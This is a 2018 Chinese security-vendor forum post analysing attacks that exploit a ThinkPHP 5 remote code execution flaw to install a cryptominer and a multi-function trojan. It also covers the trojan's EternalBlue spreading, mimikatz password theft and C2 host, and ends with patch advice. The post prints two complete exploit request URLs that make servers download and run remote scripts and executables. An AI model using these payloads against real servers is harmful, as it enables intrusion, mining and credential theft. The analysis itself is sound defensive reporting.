本帖最后由 360主动防御 于 2018-12-28 17:53 编辑
ThinkPHP是一款基于PHP的Web应用程序开发框架,它开源并且有着广泛的流行度,据统计,目前有超过50万台服务器正运行ThinkPHP(数据来源于Think PHP官网)。 攻击流程示意图
其一,利用ThinkPHP RCE漏洞进行挖矿:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh 下载挖矿木马的shell脚本
其二,利用ThinkPHP RCE漏洞执行多功能综合木马: /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘hxxp://a46.bulehero.in/download.exe’,’C:/12.exe’);start C:/12.exe 被下载到本地的Download.exe为集远控、挖矿、永恒之蓝攻击等多合一的木马:
其中,挖矿模块参数如下: 挖矿模块参数 从钱包地址查看,已经有146个门罗币的进帐: 钱包地址相关信息 Download.exe中的永恒之蓝攻击模块: 永恒之蓝攻击模块
木马会获取本地IP段,并随机生成部分IP段进行永恒之蓝攻击尝试: 基于永恒之蓝模块发起的攻击
此外,木马还会调用mimikatz获取windows账号的密码:
调用mimkatz获取windows系统账号
最后,木马还带有远控模块,其上线地址为:a45[.]bulehero[.]in 远控功能模块 远控连接 360互联网安全中心提醒广大站长: 1. 将ThinkPHP升级到5.0.23或5.1.31以上的版本,以解决此问题。 2. 如果您正在使用基于ThinkPHP5的CMS(网站内容管理系统),也可能会受此漏洞影响,同样建议对其进行升级。 3. 服务器及时安装系统漏洞补丁并使用安全软件进行防护。
ThinkPHP5安全更新说明
|